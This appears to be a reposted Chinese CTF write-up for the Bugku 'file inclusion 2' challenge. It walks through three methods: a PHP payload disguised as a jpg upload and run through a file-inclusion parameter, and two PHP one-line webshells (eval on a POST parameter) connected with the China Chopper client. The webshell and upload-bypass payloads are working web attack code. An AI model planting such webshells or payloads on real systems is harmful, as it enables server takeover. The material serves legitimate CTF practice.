bugku-檔案包含2(檔案包含漏洞)
阿新 • • 發佈:2018-11-25
本文介紹三種方法,還會講到這道題菜刀的連線。
進入題目頁面,沒有什麼特別的,只能右鍵檢視原始碼,發現提示需要跳轉到 upload.php上傳頁面
方法一:
①新建一個txt檔案寫入 <script language=php>system("ls")</script> 後另存為 jpg 格式
②選擇瀏覽上傳檔案
③訪問 儲存進去的檔案 即 Save in 後面的圖片路徑
因為我們寫入了ls命令,用於顯示當前目錄下所有檔案,發現了flag檔案
④然後訪問:http://123.206.31.85:49166/index.php?file=this_is_th3_F14g_154f65sd4g35f4d6f43.txt
方法二:一句話木馬
①不需要上傳什麼檔案,直接upload然後抓包:
②然後ctrl+r傳送到reperter裡面,傳入一句話木馬 <?=eval($_POST['pass']);>
改動如下:(在request修改完點go會在response返顯)
③複製resonse返顯資訊修改url:
正常應該是返回空白。但是菜刀連線時顯示500 Internal server error 也是沒脾氣了。
方法三:一句話木馬,連線菜刀
①我們將方法二的一句話改成下面這個:
<script language=php>echo 'a'; eval($_POST['pass']);</script>
②這種方法會返回a。並且菜刀連線成功。
That's all.